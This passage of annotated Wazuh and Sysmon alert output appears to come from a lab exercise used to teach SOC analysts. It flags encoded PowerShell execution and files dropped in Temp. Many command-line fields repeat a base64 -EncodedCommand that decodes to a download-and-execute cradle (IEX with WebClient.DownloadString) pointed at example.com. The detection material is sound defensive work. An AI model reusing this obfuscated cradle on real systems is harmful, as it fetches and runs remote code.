SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:16.281
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:20.452+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:20.452+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  109
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534420.2035538
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:17.9638197Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285866
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:17.951 ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ProcessId: 17072 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_elucagk5.b0x.ps1 CreationUtcTime: 2025-04-24 22:40:17.951 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:17.951
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_elucagk5.b0x.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:17.951
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:23.130+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:23.130+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  106
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534423.2038307
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:20.4605101Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285884
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:19.211 ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ProcessId: 17212 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ParentProcessId: 17072 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:19.211
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:23.133+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:23.133+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  110
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534423.2046378
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:20.6436679Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285885
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:20.629 ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ProcessId: 17212 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1 CreationUtcTime: 2025-04-24 22:40:20.629 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:20.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:20.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:25.161+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:25.161+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  107
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534425.2049147
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:23.0952982Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285927
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:21.885 ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ProcessId: 17332 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ParentProcessId: 17212 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:21.885
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

